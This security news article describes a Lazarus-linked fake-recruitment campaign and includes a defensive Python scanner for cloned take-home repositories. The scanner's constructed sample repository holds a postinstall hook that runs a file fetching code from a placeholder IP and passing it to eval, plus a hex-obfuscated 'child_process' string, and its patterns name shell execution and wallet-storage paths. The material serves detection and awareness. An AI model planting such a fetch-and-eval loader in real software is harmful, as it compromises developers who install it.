A new campaign attributed to the North Korea-linked Lazarus Group has surfaced in which attackers use fake LinkedIn job offers in the cryptocurrency and travel sectors to deliver malware. The tooling is cross-platform and targets Windows, macOS, and Linux.
According to cybersecurity firm Bitdefender, the operation initiates through messages on professional social networking sites, enticing potential victims with lures such as remote work, flexible hours, and attractive compensation. When a target shows interest, attackers typically request a resume or a link to a personal GitHub repository, framing this as part of a ‘hiring process.’
Bitdefender noted in its report that while these requests may appear benign, they often serve a second purpose: harvesting personal data, or lending the exchange a veneer of authenticity. Once personal details have been collected, a malicious link is sent under the pretense of sharing a GitHub or Bitbucket repository for a supposed decentralized exchange (DEX) project. Victims are then instructed to review the project and provide feedback, which in practice means cloning and running the code.
The malicious code embedded in the repository pulls next-stage payloads from a URL hard-coded in the project and deploys a cross-platform JavaScript information stealer that extracts sensitive data from cryptocurrency wallet extensions installed in the target's browser. This initial compromise is only the first stage: the stealer also acts as a loader for a Python-based backdoor that monitors clipboard changes, maintains persistent remote access, and can install additional malware.
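The practical defence for the "review our repository" lure is to look before running anything. The following scanner is an added example written for this article, not code from Bitdefender or from the campaign: it walks a cloned take-home repository and flags the behaviours described above (npm lifecycle hooks that execute on install, fetches of remote payloads, dynamic eval, hex-escaped string blobs, references to browser extension storage). The regexes and the sample repository it builds are constructed for illustration and are assumptions, not published signatures; every hit is a prompt for manual review, not proof of compromise.

```python
"""Heuristic pre-review scanner for a cloned 'take-home' repository.

Added example, not code from Bitdefender or the campaign. Patterns and the
sample repository are constructed for illustration; treat a hit as a reason
to read the file before running `npm install` or `node .`, nothing more.
"""
import json
import re
import tempfile
from pathlib import Path

# Heuristic patterns (assumptions for this example, not vendor signatures).
PATTERNS = {
    "remote_fetch": re.compile(
        r"(?:axios\.(?:get|post)|fetch|https?\.(?:get|request))\s*\(\s*['\"]https?://", re.I),
    "dynamic_eval": re.compile(r"\b(?:eval|new\s+Function)\s*\("),
    "base64_decode": re.compile(r"Buffer\.from\s*\([^)]*['\"]base64['\"]\s*\)|\batob\s*\("),
    "shell_exec": re.compile(r"child_process|\b(?:exec|execSync|spawn)\s*\("),
    "hex_escape_blob": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),   # 8+ consecutive \xNN escapes
    "browser_ext_storage": re.compile(r"Local Extension Settings|User Data[\\/]+Default"),
}
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")
SOURCE_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".py"}
SKIP_DIRS = {"node_modules", ".git"}


def scan_source(text):
    """Return [(pattern_name, line_no)] for every heuristic hit in a source file."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, rx in PATTERNS.items():
            if rx.search(line):
                hits.append((name, line_no))
    return hits


def scan_package_json(text):
    """Flag npm lifecycle hooks, which run automatically during `npm install`."""
    try:
        scripts = json.loads(text).get("scripts", {})
    except (ValueError, AttributeError):
        return [("unparseable_package_json", 0)]
    return [(f"lifecycle_hook:{hook}", 0) for hook in LIFECYCLE_HOOKS if hook in scripts]


def scan_repo(root):
    """Walk a cloned repo and return {relative_posix_path: hits} for files with hits."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root)
        if not path.is_file() or any(part in SKIP_DIRS for part in rel.parts):
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        if path.name == "package.json":
            hits = scan_package_json(text)
        elif path.suffix in SOURCE_SUFFIXES:
            hits = scan_source(text)
        else:
            continue
        if hits:
            report[rel.as_posix()] = hits
    return report


# Constructed sample repository mimicking the lure: a plausible DEX front-end
# with one file under config/ that fetches and evals a remote payload. The
# host 203.0.113.10 is a documentation address, not a real C2.
SAMPLE_FILES = {
    "package.json": json.dumps({
        "name": "dex-demo",
        "scripts": {"start": "node index.js", "postinstall": "node config/db.js"},
    }),
    "index.js": "const express = require('express');\nconst app = express();\napp.listen(3000);\n",
    "config/db.js": (
        "const axios = require('axios');\n"
        "// constructed: hex escapes hide the real string from a casual reader\n"
        "const k = '\\x63\\x68\\x69\\x6c\\x64\\x5f\\x70\\x72\\x6f\\x63\\x65\\x73\\x73';\n"
        "axios.get('http://203.0.113.10/payload').then(r => eval(r.data));\n"
    ),
}


def build_sample_repo(root):
    """Write the constructed sample files under root and return it as a Path."""
    root = Path(root)
    for rel, content in SAMPLE_FILES.items():
        dest = root / rel
        dest.parent.mkdir(parents=True, exist_ok=True)
        dest.write_text(content, encoding="utf-8")
    return root


def demo():
    """Build the sample repo in a temp dir, scan it, and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_repo(build_sample_repo(tmp))


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path)
        for name, line_no in hits:
            print(f"  line {line_no}: {name}")
```

Run it against a real clone with `scan_repo("/path/to/clone")` instead of `demo()`. The two findings that matter most in the sample are the `postinstall` hook, which executes before the candidate has read a single line, and the remote fetch piped into `eval`, which is the loader pattern the article describes; the hex-escaped blob is there because obfuscation of `child_process` and similar names defeats a plain text search, so the scanner looks for the obfuscation itself rather than the hidden word.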
Notably, the tactics align with a previously identified attack cluster known as Contagious Interview, which also covers the deployment of a JavaScript stealer named BeaverTail and a Python implant known as InvisibleFerret. Bitdefender's analysis indicates that the infection chain closely matches this cluster, while pointing out differences from the JavaScript payloads seen in past attacks. The threat actors appear to be responsive, continuously adjusting their tooling to evade detection.
Further examination shows that the malware delivered through the Python component is a .NET binary that can start a TOR proxy for communicating with its command-and-control (C2) servers, collect basic system information, and drop further payloads, including a keylogger and a cryptocurrency miner run for the attackers' profit.
Potentially impacted individuals and businesses can learn from this evolving threat. The behaviours observed map onto several techniques in the MITRE ATT&CK framework: initial access through spearphishing via a service (T1566.003, the LinkedIn approach), execution by persuading the target to run a malicious file (T1204.002, the repository review), persistent remote access through the Python backdoor, command-and-control over a multi-hop proxy (T1090.003, the TOR proxy), collection via clipboard data (T1115), keylogging (T1056.001) and credentials from web browsers (T1555.003, the wallet extensions), and resource hijacking (T1496, the miner). Privilege escalation may also be involved, and where the malware disables security tools this corresponds to Impair Defenses (T1562.001).
The evidence suggests these tactics are not isolated incidents but part of a broader and more sophisticated attack strategy. Reports of similar incidents have circulated on platforms such as LinkedIn and Reddit, underscoring how widespread these scams are. Variations on the lure include asking candidates to clone Web3 repositories or to fix deliberately planted bugs as part of the interview process.
In one instance, a Bitbucket repository linked to the fake recruitment effort referenced a now-unavailable project called "miketoken_v2." This mirrors prior campaigns: the repository names and recruiter profiles rotate frequently while the underlying malicious intent stays the same.
This disclosure comes shortly after SentinelOne reported the Contagious Interview campaign being used in conjunction with another malware variant dubbed FlexibleFerret. As these campaigns continue to evolve, businesses and individual developers alike must remain vigilant, and treat any unsolicited request to run a stranger's code as a risk to be reviewed before it is executed.